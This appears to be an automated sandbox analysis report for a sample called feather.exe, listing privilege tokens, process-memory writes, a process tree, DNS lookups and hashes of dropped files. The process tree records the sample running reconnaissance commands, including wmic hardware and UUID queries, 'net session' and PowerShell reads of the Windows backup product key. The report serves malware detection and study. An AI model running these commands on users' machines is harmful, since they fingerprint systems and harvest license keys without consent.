Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1660 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 1660 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 3428 wrote to memory of 2276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3428 wrote to memory of 2276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 3152 wrote to memory of 2572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3152 wrote to memory of 2572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2468 wrote to memory of 4892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2468 wrote to memory of 4892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2572 wrote to memory of 4392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2572 wrote to memory of 4392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 568 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 568 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 568 wrote to memory of 4816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 568 wrote to memory of 4816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2692 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2176 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2176 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2176 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2692 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2888 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2888 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\feather.exe

"C:\Users\Admin\AppData\Local\Temp\feather.exe"

C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe

C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1660 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1660 get ExecutablePath

C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe

"C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1932 --field-trial-handle=1936,i,9069365023242026152,16471774539526647506,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe

"C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --mojo-platform-channel-handle=2016 --field-trial-handle=1936,i,9069365023242026152,16471774539526647506,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\net.exe

net session

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1660 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1660 get ExecutablePath

C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe

"C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=3032 --field-trial-handle=1936,i,9069365023242026152,16471774539526647506,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 nova-screen-webview.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 nova-screen-webview.com udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 nova-screen-webview.com udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 nova-screen-webview.com udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 nova-screen-webview.com udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 nova-screen-webview.com udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 nova-screen-webview.com udp
US 8.8.8.8:53 nova-screen-webview.com udp

Files

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\chrome_100_percent.pak

MD5 a0e681fdd4613e0fff6fb8bf33a00ef1
SHA1 6789bacfe0b244ab6872bd3acc1e92030276011e
SHA256 86f6b8ffa8788603a433d425a4bc3c4031e5d394762fd53257b0d4b1cfb2ffa2
SHA512 6f6a1a8bfe3d33f3fa5f6134dac7cd8c017e38e5e2a75a93a958addbb17a601c5707d99a2af67e52c0a3d5206142209703701cd3fab44e0323a4553caee86196

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\chrome_200_percent.pak

MD5 c37bd7a6b677a37313b7ecc4ff01b6f5
SHA1 79db970c44347bd3566cefb6cabd1995e8e173df
SHA256 8c1ae81d19fd6323a02eb460e075e2f25aba322bc7d46f2e6edb1c4600e6537a
SHA512 a7b07133fa05593b102a0e5e5788b29488cb74656c5ee25de897c2ba2b2a7b05c0663ade74a003f7d6df2134d0b75f0ad25e15e9c9e0969e9453b7fc40b9f8bb

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\d3dcompiler_47.dll

MD5 2191e768cc2e19009dad20dc999135a3
SHA1 f49a46ba0e954e657aaed1c9019a53d194272b6a
SHA256 7353f25dc5cf84d09894e3e0461cef0e56799adbc617fce37620ca67240b547d
SHA512 5adcb00162f284c16ec78016d301fc11559dd0a781ffbeff822db22efbed168b11d7e5586ea82388e9503b0c7d3740cf2a08e243877f5319202491c8a641c970

